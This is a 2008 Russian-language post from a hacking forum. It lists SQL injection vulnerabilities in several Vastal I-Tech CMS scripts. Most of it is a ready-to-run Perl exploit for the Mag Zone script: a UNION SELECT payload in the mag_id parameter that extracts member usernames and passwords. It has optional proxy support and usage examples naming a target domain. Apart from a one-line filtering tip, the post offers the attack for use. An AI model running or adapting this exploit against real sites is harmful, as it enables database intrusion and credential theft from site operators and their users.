
06.09.2008, 13:27
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме: 6905523
Репутация:
1174
|
|
Vastal I-Tech CMS
Оф.сайт: vastal.com
Дата: 05.09.2008
Первоисточник: milw0rm.com
Описание:Уязвимость существует из-за недостаточной фильтрации входящего параметра, передаваемого через $_GET массив,
атакуещему позволяет провести SQL - инъекцию. Способы устранения уязвимости:проводить жесткую фильтрацию параметров перед передачей их в SQL - запрос.
Подробнее:Анти SQL-injection
Защита от SQL-injection Уязвимые компоненты:Shaadi Zone 1.0.9 (tage) SQL Injection
Cosmetics Zone (cat_id) SQL Injection
Freelance Zone (coder_id) SQL Injection
Mag Zone (cat_id) SQL Injection
MMORPG Zone (game_id) SQL Injection
Jobs Zone (news_id) SQL Injection
DVD Zone (cat_id) SQL Injection
Share Zone (id) SQL Injection
Toner Cart (id) SQL Injection
Visa Zone (news_id) SQL Injection
Agent Zone (ann_id) SQL Injection
От меня:Компонент: Mag Zone (mag_id)
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
my ($ua,$answ);
&usage;
if(!$ARGV[2]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[2]";}
print "\n\n[~]Waiting...\n[~]Getting data -- [ user_name, password ]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727");
if($ARGV[2]){
$ua->proxy('http',"http://".$ARGV[2]."/");
}
$answ = $ua->get("http://$ARGV[0]/view_mag.php?mag_id=-1+union+select+1,2,3,concat(0x3a3a3a,user_name,0x3a,password,0x3a3a3a),5,6,7,8,9,10,11,12,13,14,15,16,17+from+members/*")->content;
$answ =~m#:::(.+):(.+):::#;
if(!$1) {print "\nExploit failed!";}
else { print "\n\nlogin : $1\npassword : $2\n"; }
sub usage
{
print q
{
######################################################################
Vastal I-Tech Mag Zone (mag_id) SQL Injection Exploit
INFO:
Author: ZAMUT
Vuln: mag_id=
Homepage: http://antichat.ru
Usage: exploit.pl [path] [proxy]
Example:
perl exploit.pl www.vastal.com/mag 62.123.110.134:8080
######################################################################
};
}
Используется так:perl exploit.pl [полный путь до скрипта] [прокси:порт]
Пример: perl exploit.pl www.vastal.com/mag 62.123.110.134:8080 или
perl exploit.pl www.vastal.com/mag Поддержка только http - прокси.
__________________
в строю
Последний раз редактировалось ZAMUT; 06.09.2008 в 14:44..
|
|
|